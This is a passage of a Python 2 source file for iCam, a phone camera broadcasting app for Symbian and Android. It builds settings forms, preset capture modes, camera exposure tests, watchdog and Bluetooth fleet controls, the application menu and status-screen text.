        (u"Number of upload threads for burst mode", "number",
            numThreadsUpload),
        (u"Battery level threshold % (for PM)", "number",
            BATTERY_LEVEL_THRESHOLD),
        #(u"Debug logging (all; mask=%d)" % mask, "combo", (yesNoComboList,
        (u"Debug logging (all)", "combo", (yesNoComboList,
            MY_DEBUG_STDOUT or MY_DEBUG_STDERR or
            MY_DEBUG_STDERR_2 or MY_DEBUG_UPLOAD_MSG))
        # add Log: MY_DEBUG_*!!!!
    ]
    if ANDROID_OS:
        try:
            startAutomatically = DialogMultipleChoices( \
                myFields[0][0] + u"?", yesNoComboList, int(startAutomatically))
            storeLocallyMediaStrList = [ u"Do not store media", \
                u"Store all media" ]
            storeLocallyMedia = DialogMultipleChoices(myFields[1][0], \
                storeLocallyMediaStrList, int(storeLocallyMedia))
            StoreState()
        except:
            # StoreLocalConfigInFile()
            DebugPrintErrorTrace()
    elif SYMBIAN_OS:
        try:
            # Initialize a boolean variable to know whether the form is saved.
            miscFormSaved = False
            # appuifw.app.title = u"YouTube/Picasa"
            appuifw.app.title = u"Misc"
            # Creates the form
            """
            #define KFormEditModeOnly 0x0001
            #define KFormViewModeOnly 0x0002
            #define KFormAutoLabelEdit 0x0004
            #define KFormAutoFormEdit 0x0008
            #define KFormDoubleSpaced 0x0010
            # miscForm = appuifw.Form(myFields,
            #                flags = appuifw.FFormEditModeOnly)
            # miscForm = appuifw.Form(myFields,
            #                appuifw.FFormEditModeOnly)
            """
            miscForm = appuifw.Form(myFields, appuifw.FFormEditModeOnly | \
                appuifw.FFormDoubleSpaced)
            # Define a function to be called when the form is saved.
            def MiscFormOnSave(arg):
                global miscFormSaved
                miscFormSaved = True
                return True
            # Assign the save function.
            miscForm.save_hook = MiscFormOnSave
            #Show the form. This operation is blocking until we close the form.
            miscForm.execute()
            # After the form is saved and closed, display the information.
            if miscFormSaved == True:
                """
                The combo form field value is a long integer.
                We convert it to int because we would receive
                "TypeError: Form combo field, bad index"
                at the next instantiation of appuifw.Form().
                """
                startAutomatically = int(miscForm[0][2][1])
                storeLocallyMedia = int(miscForm[1][2][1])
                if LOCAL_FOLDER != str(miscForm[2][2]):
                    # It seems miscForm[2][2] is unicode
                    LOCAL_FOLDER = str(miscForm[2][2])
                    DebugPrint("MiscellaneousSettingsMenu(): set " \
                        "LOCAL_FOLDER = %s" % LOCAL_FOLDER)
                    # The derived folders must track the new root.
                    global LOCAL_FOLDER_MEDIA_FILES, LOCAL_FOLDER_UNSENT_FILES
                    LOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER + "/Media"
                    LOCAL_FOLDER_UNSENT_FILES = LOCAL_FOLDER + "/Unsent"
                    CreateDirectoriesAndLogFiles()
                numThreadsUpload = int(miscForm[3][2])
                BATTERY_LEVEL_THRESHOLD = int(miscForm[4][2])
                # A single "Debug logging (all)" combo drives all four flags.
                MY_DEBUG_STDOUT = int(miscForm[5][2][1])
                MY_DEBUG_STDERR = int(miscForm[5][2][1])
                MY_DEBUG_STDERR_2 = int(miscForm[5][2][1])
                MY_DEBUG_UPLOAD_MSG = int(miscForm[5][2][1])
                StoreState()
        except:
            #StoreLocalConfigInFile()
            DebugPrintErrorTrace()
        """
        # Doesn't work in Python 2.2 (e.g., PyS60 1.4.5).
        finally:
            appuifw.app.title = ICAM_APP_TITLE
        """
        appuifw.app.title = ICAM_APP_TITLE
    # """
    if MY_DEBUG_STDOUT:
        try:
            print "MiscellaneousSettingsMenu(): at the end"
            print "  startAutomatically =", startAutomatically
            print "  readGPS =", readGPS
            sys.stdout.flush()
        except:
            DebugPrintErrorTrace()
    # """
# This var is required as a global.
# Set True by AnalysisFormOnSave() so MediaAnalysisMenu() knows whether the
# user saved (rather than cancelled) the "Media Analysis" form.
analysisFormSaved = False
def MediaAnalysisMenu():
    """Show the "Media Analysis" settings UI (motion detection on/off).

    Effective on Symbian only (the Android branch is a stub).  Updates the
    motionDetectionIsOn global and persists it via StoreState().
    """
    global analysisFormSaved
    # global burstModeIsStarted
    global motionDetectionIsOn
    # Create a list to be used in "combo" selection mode
    yesNoComboList = [u"No", u"Yes"]
    noComboList = [u"No"]
    myFields = [(u"Use Motion Detection for Photo Burst Mode", "combo",
        (yesNoComboList, motionDetectionIsOn))]
    if ANDROID_OS:
        try:
            pass
        except:
            DebugPrintErrorTrace()
    elif SYMBIAN_OS:
        try:
            # Initialize a boolean variable to know whether the form is saved.
            analysisFormSaved = False
            #appuifw.app.title = u"Motion Detection"
            appuifw.app.title = u"Media Analysis"
            # Creates the form
            #analysisForm = appuifw.Form(myFields,
            #                            flags = appuifw.FFormEditModeOnly)
            #analysisForm = appuifw.Form(myFields, appuifw.FFormEditModeOnly)
            #analysisForm = appuifw.Form(myFields, appuifw.FFormDoubleSpaced)
            analysisForm = appuifw.Form(myFields, appuifw.FFormEditModeOnly |
                appuifw.FFormDoubleSpaced)
            # Define a function to be called when the form is saved.
            def AnalysisFormOnSave(arg):
                global analysisFormSaved
                analysisFormSaved = True
                return True
            # Assign the save function.
            analysisForm.save_hook = AnalysisFormOnSave
            #Show the form. This operation is blocking until we close the form.
            analysisForm.execute()
            # After the form is saved and closed, display the information.
            if analysisFormSaved == True:
                """
                The combo form field value is a long integer.
                We convert it to int because we would receive
                "TypeError: Form combo field, bad index"
                at the next instantiation of appuifw.Form().
                """
                motionDetectionIsOn = int(analysisForm[0][2][1])
                # viewFinderSize = (80, 60)
                # photoResolutionIndex = 2 #Why?
                # SetUploadedPhotoResolutionIndex(2)
                DebugPrint("MediaAnalysisMenu(): motionDetectionIsOn = %d" % \
                    motionDetectionIsOn)
                StoreState()
        except:
            # StoreLocalConfigInFile()
            DebugPrintErrorTrace()
        """
        # Doesn't work in Python 2.2 (e.g., PyS60 1.4.5).
        finally:
            appuifw.app.title = ICAM_APP_TITLE
        """
        appuifw.app.title = ICAM_APP_TITLE
"""
PyS60 menu:
Start Broadcasting
Select Preset Mode
Main - Video Record
Main - Take Photo
Main - Burst Photos
Main - Burst Videos
Capture What
Viewfinder
Settings
Select Servers
Select Access Point
Record Config
Photo Config
Pause Interval
#Motion Detection
Media Analysis
Misc
# Select BT Mode (Maybe call it Communication/Networking Config)
Bluetooth Intranet
Display Info
Help
Exit
"""
def SelectPresetMainVideoRecord():
    """Preset "Main Cam: Video Record": continuous video on the main camera."""
    global cameraMode, videoRecordDuration, readGPS, pauseInterval, \
        localPhotoResolutionIndex, photoResolutionIndex
    global videoAudioEnabled, localVideoModeIndex, storeLocallyMedia
    # Main camera records video (mode 1); the second camera is disabled.
    cameraMode[0], cameraMode[1] = 1, 0
    videoAudioEnabled = 1
    storeLocallyMedia = 1
    readGPS = 0
    # Two minutes between capture rounds.
    pauseInterval = 120
    # Persist the preset.
    StoreState()
def SelectPresetMainTakePhoto():
    """Preset "Main Cam: Take Photo": periodic photos on the main camera."""
    global cameraMode, videoRecordDuration, readGPS, pauseInterval, \
        localPhotoResolutionIndex, photoResolutionIndex
    global videoAudioEnabled, localVideoModeIndex, storeLocallyMedia
    # Main camera takes photos (mode 2); the second camera is disabled.
    cameraMode[0], cameraMode[1] = 2, 0
    photoResolutionIndex = 1
    videoAudioEnabled = 1
    storeLocallyMedia = 1
    readGPS = 0
    # Two minutes between capture rounds.
    pauseInterval = 120
    # Persist the preset.
    StoreState()
def SelectPresetMainBurstPhotos():
    """Preset "Main Cam: Burst Photos": low-res photos with no pause."""
    global cameraMode, videoRecordDuration, readGPS, pauseInterval, \
        localPhotoResolutionIndex, photoResolutionIndex
    global videoAudioEnabled, localVideoModeIndex, storeLocallyMedia
    global uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer
    # Main camera takes photos (mode 2); the second camera is disabled.
    cameraMode[0], cameraMode[1] = 2, 0
    readGPS = 0
    # Burst: no pause between captures, small resolution.
    pauseInterval = 0
    photoResolutionIndex = 4  # 160x120; 6 = 320x240
    # Persist both the local config file and the state.
    StoreLocalConfigInFile()
    StoreState()
def SelectPresetMainBurstVideos():
    """Preset "Main Cam: Burst Videos": back-to-back video recordings."""
    global cameraMode, videoRecordDuration, readGPS, pauseInterval, \
        localPhotoResolutionIndex, photoResolutionIndex
    global videoAudioEnabled, localVideoModeIndex, storeLocallyMedia
    global uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer
    # Main camera records video (mode 1); the second camera is disabled.
    cameraMode[0], cameraMode[1] = 1, 0
    readGPS = 0
    # Burst: no pause between recordings.
    pauseInterval = 0
    # Persist both the local config file and the state.
    StoreLocalConfigInFile()
    StoreState()
def SetCameraParametersMenu():
    """Experimentally cycle the main camera through exposure settings.

    Symbian only: calls the low-level camera extension directly.  Parameter
    order (per the comments below): aMode, aSize, aZoom, aFlash, aExp,
    aWhite, aISORate.  NOTE(review): the two 10 s sleeps make this call
    block for about 20 seconds.
    """
    if SYMBIAN_OS:
        """
        /** Specifies the type of exposure. - EExposureAuto is the default
        value. */
        enum TExposure
            {
            /** Set exposure automatically. Default, always supported. */
            EExposureAuto = 0x0000,
            /** Night-time setting for long exposures. */
            EExposureNight = 0x0001,
            /** Backlight setting for bright backgrounds. */
            EExposureBacklight = 0x0002,
            /** Centered mode for ignoring surroundings. */
            EExposureCenter = 0x0004,
            /** Sport setting for very short exposures. */
            EExposureSport = 0x0008,
            /** Generalised setting for very long exposures. */
            EExposureVeryLong = 0x0010,
            /** Snow setting for daylight exposure. */
            EExposureSnow = 0x0020,
            /** Beach setting for daylight exposure with reflective glare. */
            EExposureBeach = 0x0040,
            /** Programmed exposure setting. */
            EExposureProgram = 0x0080,
            /** Aperture setting is given priority. */
            EExposureAperturePriority = 0x0100,
            /** Shutter speed setting is given priority. */
            EExposureShutterPriority = 0x0200,
            /** User selectable exposure value setting. */
            EExposureManual = 0x0400,
            /** Exposure night setting with colour removed to get rid of colour
            noise. */
            EExposureSuperNight = 0x0800,
            /** Exposure for infra-red sensor on the camera */
            EExposureInfra = 0x1000
            };
        /** Specifies how the white balance is set. */
        enum TWhiteBalance
            {
            /** Set white balance automatically. Default, always supported. */
            EWBAuto = 0x0000,
            /** Normal daylight. */
            EWBDaylight = 0x0001,
            /** Overcast daylight. */
            EWBCloudy = 0x0002,
            /** Tungsten filament lighting. */
            EWBTungsten = 0x0004,
            /** Fluorescent tube lighting */
            EWBFluorescent = 0x0008,
            /** Flash lighting. */
            EWBFlash = 0x0010,
            /** High contrast daylight primarily snowy */
            EWBSnow = 0x0020,
            /** High contrast daylight primarily near the sea */
            EWBBeach = 0x0040,
            /** User configurable mode */
            EWBManual = 0x0080,
            /** Shade */
            EWBShade = 0x0100
            };
        """
        try:
            #camera._my_camera.SetCameraParameters(2, 0, 0, 0, 16, 2, 0)
            # #aMode, &aSize, &aZoom, &aFlash, &aExp, &aWhite (2, 4, 8, etc),
            # aISORate
            # aMode, &aSize, &aZoom, &aFlash, &aExp, &aWhite (2, 4, 8, etc),
            # aISORate
            # aExp = 1 is EExposureNight (see enum above).
            camera._my_camera.SetCameraParameters(2, 0, 0, 0, 1, 0, 0)
            # camera._my_camera.SetCameraSettings()
            camera._my_camera.ApplyCameraSettings()
            # """
            SleepAndPetWatchdog(10.0)
            # aMode, &aSize, &aZoom, &aFlash, &aExp, &aWhite (2, 4, 8, etc),
            # aISORate
            #camera._my_camera.SetCameraParameters(2, 0, 0, 0, 16, 2, 1)
            # aMode, &aSize, &aZoom, &aFlash, &aExp, &aWhite (2, 4, 8, etc),
            # aISORate
            # aExp = 16 (0x0010) is EExposureVeryLong (see enum above).
            camera._my_camera.SetCameraParameters(2, 0, 0, 0, 16, 0, 0)
            # camera._my_camera.SetCameraSettings()
            camera._my_camera.ApplyCameraSettings()
            # """
            SleepAndPetWatchdog(10.0)
            # aMode, &aSize, &aZoom, &aFlash, &aExp, &aWhite (2, 4, 8, etc),
            # aISORate
            # Back to aExp = 0: EExposureAuto (the default).
            camera._my_camera.SetCameraParameters(2, 0, 0, 0, 0, 0, 0)
        except:
            DebugPrintErrorTrace()
def StopWatchdog():
    """Kill the external Watchdog process (Symbian only).

    When using the phone manually/directly, the alternatives are: kill the
    watchdog and later restart the phone to re-dedicate it to iCam, or keep
    the watchdog but make iCam's pause interval much bigger (e.g., 10 hr)
    and manually restore it afterwards.
    """
    if not SYMBIAN_OS:
        return
    DebugPrint("Entered StopWatchdog().")
    try:
        # The running instance is named like "Watchdog.exe[ef1e172d]0001",
        # so a wildcard on the executable name is enough to match it.
        numKilled = miso.kill_process(u"Watchdog*", 0)  # 0 = kill reason
        DebugPrint("StopWatchdog(): miso.kill_process(...) returned "
            "%d (#processes killed)." % numKilled)
    except:
        DebugPrintErrorTrace()
"""
For Symbian OS:
http://discussion.forum.nokia.com/forum/showthread.php?125168-Python-for-S60-1.4.2-released
"Yep. Seems to be in "pys60-1.4.2_src\src\appui\Python_appui.h".
### KMaxPythonMenuExtensions 30 ###"
"Yes, it's an arbitrary limit. The reason it's not unlimited is that an
entry in the resource file app/Python.rss is needed for every
submenu entry -- or at least that's the only way we could make it
work. You'll need to add more entries there if you want to add more
submenu entries.
Though, is a menu with over 30 entries really usable? What's the
use case?"
http://discussion.forum.nokia.com/forum/showthread.php?144408-appuifw.app.menu-limitations
"I think it's the number of all list items, including submenus..."
"Does not generate the error, but the items in the submenu do not
behave as expected... "
http://discussion.forum.nokia.com/forum/showthread.php?69342-How-many-levels-for-a-menu-app
"The question you were originally asking, i.e. depth, is unfortunately
only 2, meaning that you can have a menu and a submenu in the menu.
A submenu cannot have submenus - this is limited by the underlying
UI framework, not the PyS60 implementation."
PyS60 docs: "The maximum allowed number of items in a menu, or items in a
submenu, or submenus in a menu is 30."
"""
#!!!!TODO: compute BT_CLIENTS from btMsgMostRecentTime
# Bluetooth addresses of the peer phones that receive commands written by
# ChangePhonesActivity_real().
BT_CLIENTS = [BT_ADDR_6680, BT_ADDR_6120, BT_ADDR_N95]
def ChangePhonesActivity_real(aPauseInterval):
    """Write command files that retarget the pause interval, then run them.

    The local phone gets aPauseInterval; every Bluetooth peer in BT_CLIENTS
    gets twice that value.  One command file is written per peer (rather
    than sending over BT in one go) because sending via BT can crash the
    iCam S60 version.  Finally DownloadCommands_real() executes the files.
    """
    basePathFileName = LOCAL_FOLDER + "/" + COMMANDS_FILENAME
    # Command for the local phone.
    localFile = open(basePathFileName, "wt")
    localFile.write("set-pause-interval %d" % aPauseInterval)
    localFile.close()
    # One numbered command file per Bluetooth peer (doubled interval).
    fileIndex = 0
    for btAddr in BT_CLIENTS:
        fileIndex += 1
        peerFile = open(basePathFileName + ".%d" % fileIndex, "wt")
        peerFile.write("send-command-via-bluetooth " + btAddr +
            " set-pause-interval %d" % (aPauseInterval * 2))
        peerFile.close()
    DownloadCommands_real()
ChangePhonesActivity = lambda pauseInterval: lambda : ChangePhonesActivity_real(pauseInterval)
def SetMenu(firstTime=False):
    """(Re)build the application menu for the current platform and state.

    firstTime semantics: truthy only on the very first call (Android then
    builds its options menu and starts the UI event-handler thread); on
    Symbian, -1 means "do not prepend the Start/Stop entry", while any other
    value prepends Start or Stop depending on startButtonPressed.
    """
    global pauseIntervalStr, photoResolutionStr, phoneModel, deviceId
    global readGPS
    global numCamerasSupported
    global menuTable
    global startButtonPressed
    DebugPrint("Entered SetMenu().")
    if ANDROID_OS:
        """
        menuTable = {
            #"Config": {"label": "Config", "event": DisplayDeviceId,
            #            "eventData": None, "iconName": "ic_menu_edit"},
            "Display Device Id": {"event": DisplayDeviceId,
                                  "eventData": None,
                                  "iconName": "ic_menu_edit"},
            "Exit": {"event": Quit,
                     "eventData": None,
                     "iconName": "ic_delete"}
        }
        """
        def CreateOptionsMenu():
            """
            From https://groups.google.com/group/android-scripting/browse_thread/thread/c9f9c43101a93263
            "The options menu is implicitly created when you add items to it. "
            """
            # myDroid.clearOptionsMenu()
            # for myItemKey in menuTable:
            for myItemKey in sorted(menuTable.keys()):
                """
                If the 2nd element of the tuple-value pointed by myItemKey is
                None it is normally an item used only in PyS60.
                """
                if menuTable[myItemKey][1] is not None:
                    #myDroid.addOptionsMenuItem(myItemKey, myItemKey,
                    #            menuTable[myItemKey]["eventData"],
                    #            menuTable[myItemKey]["iconName"])
                    """
                    If it not None we print a different icon than standard.
                    See http://developer.android.com/reference/android/R.drawable.html
                    for the various icon name strings.
                    """
                    if menuTable[myItemKey][3] is None:
                        myDroid.addOptionsMenuItem(str(menuTable[myItemKey][0]),
                            myItemKey, menuTable[myItemKey][2])
                    else:
                        myDroid.addOptionsMenuItem(str(menuTable[myItemKey][0]),
                            myItemKey, menuTable[myItemKey][2],
                            menuTable[myItemKey][3])
            """
            for myItemKey, itemVal in tel.iteritems():
                myDroid.addOptionsMenuItem(myItemKey, myItemKey,
                                           itemVal["eventData"],
                                           itemVal["iconName"])
            """
        if firstTime:
            if ANDROID_OS_QPYTHON:
                #if False: #ANDROID_OS_QPYTHON:
                # QPython has no options menu support here: start directly.
                startButtonPressed = True
                DisplayNote("Test on QPython.")
                ReactiveLoopOnlyIfStartButtonNotAlreadyPressed()
            else:
                CreateOptionsMenu()
                """
                from threading import Thread
                uiEventHandlerThread = Thread(target = eventHandler)
                uiEventHandlerThread.start()
                """
                #thread.start_new_thread(EventHandler, ())
                MyThreadStart(EventHandler)
                #                (videoFileName, videoPathFileName))
    elif SYMBIAN_S60_OS:
        # elif SYMBIAN_OS:
        try:
            """
            IMPORTANT: myAppMenu has at most 23 menu and submenu (-3 which are
            not added for certain phones) items.
            """
            myAppMenuSettings = ( \
                (menuTable["0Servers"][0], menuTable["0Servers"][1]), \
                (u"Select Access Point", SelectAccessPoint), \
                (menuTable["1Record_Config"][0],
                    menuTable["1Record_Config"][1]), \
                (u"Photo Config", PhotoConfigMenu), \
                (u"Pause Interval", PauseIntervalMenu), \
                #(u"Motion Detection", AnalysisMenu), \
                (u"Media Analysis", MediaAnalysisMenu), \
                (menuTable["Select_BT_Mode"][0],
                    menuTable["Select_BT_Mode"][1]), \
                (u"Misc", MiscellaneousSettingsMenu) \
            )
            """
            myAppMenu = [ \
                (u"Display phone ID", DisplayDeviceId), \
                (u"Settings", (myAppMenuSettings))
            ]
            """
            # if gdataModulesImported:
            if True:
                myAppMenu = [ \
                    (u"Select Preset Mode", ( \
                        (u"Main Cam: Video Record",
                            SelectPresetMainVideoRecord), \
                        (u"Main Cam: Take Photo", SelectPresetMainTakePhoto), \
                        (u"Main Cam: Burst Photos",
                            SelectPresetMainBurstPhotos), \
                        (u"Main Cam: Burst Videos",
                            SelectPresetMainBurstVideos) \
                        #(u"Burst Video Main", ConfirmQuit) \
                        ), \
                    ), \
                    (menuTable["01CaptureWhat"][0],
                        menuTable["01CaptureWhat"][1]) \
                    #(u"YouTube/Picasa", SelectServersMenu)
                ]
            else:
                myAppMenu = []
            # We (try) do not show Viewfinder menu item while doing video
            # recording.
            if videoRecordStartTime == -1:
                if viewFinderStarted:
                    if numCamerasSupported >= 1:
                        myAppMenuVF = ((u"Stop Viewfinder",
                            StopViewFinderForCameraCallable), )
                else:
                    if numCamerasSupported == 1:
                        myAppMenuVF = ((u"Start Main Viewfinder",
                            StartViewFinderForCameraCallable(0,
                            True)), ) # IMPORTANT: the comma is required
                    elif numCamerasSupported == 2:
                        myAppMenuVF = ((u"Start Main Viewfinder",
                            StartViewFinderForCameraCallable(0,
                            True)), (u"Start VGA Viewfinder",
                            StartViewFinderForCameraCallable(1,
                            True)))
                myAppMenu = myAppMenu + [(u"Viewfinder", myAppMenuVF)]
            # Per-device extras: E7 gets the camera-parameters experiment,
            # N82 gets watchdog/fleet-activity controls.
            if deviceId == IMEI_E7:
                #if deviceId == IMEI_N82:
                myAppMenu += [ \
                    #(menuTable["Display_device_ID"][0],
                    # menuTable["Display_device_ID"][1]), \
                    (menuTable["Settings"][0], (myAppMenuSettings)), \
                    (u"SetCameraParams", SetCameraParametersMenu), \
                    (menuTable["Display_Info"][0],menuTable["Display_Info"][1])
                ]
            elif deviceId == IMEI_N82:
                #elif deviceId == IMEI_E7:
                # The menu entry toggles between sleep/active depending on
                # the current pauseInterval.
                if pauseInterval < 600:
                    menuStrStandbyActive = u"All phones to sleep"
                    pauseStandbyActive = PAUSE_INTERVAL_POWER_MANAGED # / 2
                else:
                    menuStrStandbyActive = u"All phones to active"
                    pauseStandbyActive = 120
                myAppMenu += [ \
                    #(menuTable["Display_device_ID"][0],
                    # menuTable["Display_device_ID"][1]), \
                    (menuTable["Settings"][0], (myAppMenuSettings)), \
                    #(u"SetCameraParams", SetCameraParametersMenu), \
                    (u"Stop Watchdog", StopWatchdog),
                    (menuStrStandbyActive, ChangePhonesActivity(pauseStandbyActive)),
                    (menuTable["Display_Info"][0],menuTable["Display_Info"][1])
                ]
            else:
                myAppMenu += [ \
                    #(menuTable["Display_device_ID"][0],
                    # menuTable["Display_device_ID"][1]), \
                    (menuTable["Settings"][0], (myAppMenuSettings)), \
                    (menuTable["Display_Info"][0],menuTable["Display_Info"][1])
                ]
            """
            if numCamerasSupported == 1:
                myAppMenu += [ \
                    (u"Cameras Used", \
                        ( \
                        (u"%s" % camerasUsedStr[0], SetCamerasUsed(0)), \
                        (u"%s" % camerasUsedStr[3], SetCamerasUsed(3)) \
                        ) \
                    )
                ]
            elif numCamerasSupported == 2:
                myAppMenu += [ \
                    (u"Cameras Used", \
                        ( \
                        (u"%s" % camerasUsedStr[0], SetCamerasUsed(0)), \
                        (u"%s" % camerasUsedStr[1], SetCamerasUsed(1)), \
                        (u"%s" % camerasUsedStr[2], SetCamerasUsed(2)), \
                        (u"%s" % camerasUsedStr[3], SetCamerasUsed(3)) \
                        ) \
                    )
                ]
            """
            myAppMenu = myAppMenu + [ \
                #(u"Send Inbox SMSes", UploadInboxSMSes), \
                (u"Help", Help),
                (u"Exit", ConfirmQuit) \
                #(u"Exit", Quit) \
                #(menuTable["0Exit"][0], menuTable["0Exit"][1])
            ]
            #"""
            #(u"Record Duration", SetRecordDurationMenu(0)), \
            #(u"Upload Media", Quit), \
            #(u"Record Main 7 sec", SetRecordDurationMenu(0)), \
            #(u"Record VGA 7 sec", SetRecordDurationMenu(1)), \
            #(u"Restart Cellphone", Quit), \
            #"""
            if firstTime == -1:
                pass
            elif firstTime != -1:
                #if (firstTime == True) or (firstTime == False):
                # Prepend Stop while broadcasting, Start otherwise.
                if startButtonPressed:
                    #myAppMenu = [(u"Start", ReactiveLoop)] + myAppMenu
                    myAppMenu = [(menuTable["00Stop"][0],
                        menuTable["00Stop"][1])] + myAppMenu
                else:
                    #myAppMenu = [(u"Start", ReactiveLoop)] + myAppMenu
                    myAppMenu = [(menuTable["00Start"][0],
                        menuTable["00Start"][1])] + myAppMenu
            appuifw.app.menu = myAppMenu
        except:
            (exceptionType, exceptionValue, exceptionTraceback) = \
                sys.exc_info()
            errorStr = "SetMenu(): (free_ram = %d) returned exception %s." \
                % (GetFreeRAM(),
                repr(traceback.format_tb(exceptionTraceback)))
            if MY_DEBUG_UPLOAD_MSG:
                UploadGZippedData(deviceId, errorStr, ICAM_SERVER_NAME,
                    WEBPAGE_UL_GZIPPED_TEXT, None)
            DebugPrint(errorStr)
            if MY_DEBUG_STDERR:
                sys.stderr.write("    " + errorStr + "\n")
            DebugPrintErrorTrace()
        """
        This has the effect of flushing the eventual pending UI events.
        From [Mobile_Python_2007]: "The e32.ao_yield() at the end of the
        loop makes sure that the system leaves some time to register
        the keyboard events, as drawing in the tight loop consumes lots
        of CPU power and might make the system unresponsive."
        From PyS60 2.0 documentation: Yields to the active scheduler to have
        ready active objects with priority above normal scheduled for
        running. This has the effect of flushing the eventual pending UI
        events. Note that the UI callback code may be run in the context of
        the thread that performs an ao_yield. For information on active
        scheduler, see S60 SDK documentation [4].
        """
        e32.ao_yield()
    elif SYMBIAN_UIQ_OS:
        # When executed the code for S60 it gave LDR-IMPORT error, Reason 2??
        pass
    elif WINDOWS_CE_OS_PYTHONCE:
        pass
    DebugPrint("Exiting SetMenu().")
def GetTextPauseInterval():
    """Return the global pauseInterval formatted as "[Dd ][HHh ][MMm ]SSs".

    Leading zero-valued units are omitted (e.g. 90 -> "01m 30s",
    45 -> "45s").  Returns "INVALID pause value" when pauseInterval is
    unusable (e.g. not a number).
    """
    res = ""
    try:
        # divmod() keeps the arithmetic integral on both Python 2 and 3.
        # Fix: the previous code compared with ">" instead of ">=", so exact
        # unit boundaries were mis-rendered (60 -> "60s" instead of
        # "01m 00s", 3600 -> "60m 00s" instead of "01h 00m 00s").
        days, remainder = divmod(pauseInterval, 24 * 3600)
        hrs, remainder = divmod(remainder, 3600)
        mins, secs = divmod(remainder, 60)
        if days > 0:
            res += "%dd " % days
        # Once a larger unit is printed, keep the smaller ones zero-padded.
        if (hrs > 0) or (res != ""):
            res += "%02dh " % hrs
        if (mins > 0) or (res != ""):
            res += "%02dm " % mins
        if (secs >= 0) or (res != ""):
            res += "%02ds" % secs
    except:
        res = "INVALID pause value"
        DebugPrintErrorTrace()
    return res
def ClearScreen():
    """Erase the canvas by painting it black (Symbian only; no-op elsewhere).

    The rectangle size follows the orientation: on S60 3rd edition or newer
    a landscape canvas is displaySizeMax x displaySizeMin, otherwise
    displaySizeMin x displaySizeMax.
    """
    global displaySizeMax, displaySizeMin
    if SYMBIAN_OS:
        try:
            # Draw a black rectangle to erase the screen.
            if S60_EDITION[0] >= 3:
                if appuifw.app.orientation == "landscape":
                    canvas.rectangle((0, 0, displaySizeMax - 1,
                        displaySizeMin - 1), fill=0) # , width = 20)
                else:
                    # appuifw.app.orientation == "portrait"
                    canvas.rectangle((0, 0, displaySizeMin - 1,
                        displaySizeMax - 1), fill=0) # , width = 20)
            else:
                canvas.rectangle((0, 0, displaySizeMin - 1,
                    displaySizeMax - 1), fill=0) # , width = 20)
        except:
            DebugPrintErrorTrace()
# """
doNotDisplayRedrawInfo = False
myTextMainCam = ""
myTextVGACam = ""
myTextUpload = ""
myTextAPName = ""
myTextVer = ""
myTextGoogle = ""
def ComputeInfoStrings():
    """Refresh the myText* status-line globals from the current settings."""
    global myTextMainCam, myTextVGACam, myTextUpload, myTextAPName, myTextVer
    global myTextGoogle

    def _DescribeCamera(label, camIndex):
        # One-line description of a camera's configured mode; unknown mode
        # values contribute no description (only the trailing period).
        text = label
        mode = cameraMode[camIndex]
        if mode == 0:
            text += "not used"
        elif mode == 1:
            text += "video rec, %d [sec]" % videoRecordDuration[camIndex]
        elif mode == 2:
            text += "take photos"
        elif mode == 3:
            text += "take video and photos"
        return text + "."

    myTextMainCam = "Main camera: "
    if numCamerasSupported > 0:
        myTextMainCam = _DescribeCamera("Main camera: ", 0)
    myTextVGACam = "VGA camera: "
    if numCamerasSupported >= 2:
        myTextVGACam = _DescribeCamera("VGA camera: ", 1)
    # Accumulate the list of upload destinations.
    uploadText = u"Upload to: "
    if uploadMediaToYouTube:
        uploadText += "YouTube "
    if uploadMediaToPicasa:
        uploadText += "Picasa "
    if uploadMediaToYouTube or uploadMediaToPicasa:
        myTextGoogle = u"Google username: " + googleUsername
    if useiCamServer == 1:
        uploadText += "iCam(no media)"
    elif useiCamServer == 2:
        uploadText += "iCam(all)"
    myTextUpload = uploadText + "."
    myTextVer = u"iCam ver: %s." % CURRENT_RELEASE_TIME
    myTextAPName = u" Access point used: %s." % accessPointName
#!!!!TODO: reuse code from DisplayRedrawInfoDisplayExtensiveInfo(displayMode=1, displayAllInfo=True):
def DisplayRedrawInfo(partialForAndroid=False):
    """Redraw the idle/status screen.

    On Symbian the status summary is painted directly on the canvas;
    several guards bail out early (doNotDisplayRedrawInfo, portrait
    orientation on Symbian^3) because drawing in those states crashed in
    the field.  On Android an HTML status page is (re)written under
    LOCAL_FOLDER and shown in a WebView -- unless partialForAndroid is
    True, in which case the page is only rewritten, not displayed.
    All drawing errors are logged and swallowed.
    """
    DebugPrint("Entered DisplayRedrawInfo().")
    myTextAudio = u"Microphone rec duration: %d [sec]." % audioRecordDuration
    myTextPause = u"Pause: %s." % GetTextPauseInterval()
    # Refresh the cached myText* status strings before rendering them.
    ComputeInfoStrings()
    if SYMBIAN_OS:
        global doNotDisplayRedrawInfo
        if doNotDisplayRedrawInfo == True:
            DebugPrint("DisplayRedrawInfo(): getting out because " \
                       "doNotDisplayRedrawInfo == True.")
            """
            Otherwise it seems it crashes if we do the following operations,
            while in the AP Selection dialog.
            """
            return
        """
        if SYMBIAN_S60_3RD_ED and (not _PyS60_1_9_OR_NEWER):
            return
        """
        if SYMBIAN_3:
            if appuifw.app.orientation == "portrait":
                DebugPrint("DisplayRedrawInfo(): getting out because " \
                           "appuifw.app.orientation == 'portrait'.")
                """
                Otherwise it seems it crashes if we do the following operations
                (is it because it is printing out of screen??) - see for ex
                Z:\1PhD\ReVival\Logs\NokiaE7\2011_05_07\stdout_2011_05_07_15_37_43.txt.
                """
                return
        DebugPrint("DisplayRedrawInfo(): here 0.")
        try:
            # At line 0 we have the 3G sign and the application title.
            myDelta = 20
            # if startButtonPressed == False:
            if startButtonPressed:
                canvas.text((10, 10 + myDelta), u"iCam is broadcasting.",
                            fill=(0, 255, 0), font="normal")
                #'annotation', 'title', 'legend', 'symbol', 'dense', 'normal'
            else:
                # Note: the visible canvas for normal display on S60 3rd is of
                # 320 x 210 pixels
                #canvas.text((10, 0 + myDelta), u"Welcome to iCam!",
                #    fill=(0, 255, 255))
                #canvas.text((10, 15 + myDelta), u"Configure iCam, then go " \
                #    "to Options and hit Start to run.", fill = (0, 255, 0))
                #canvas.text((10, 15 + myDelta), u"Configure iCam & Start " \
                #    "Broadcasting.", fill = (255, 0, 0))
                # Portrait screens are narrower, so use the short prompt.
                if orientationForThisPhoneModel == "portrait":
                    myText = u"Configure & Start"
                else:
                    myText = u"Configure iCam & Start Broadcasting."
                canvas.text((10, 10 + myDelta), myText,
                            fill=(255, 0, 0), font="normal")
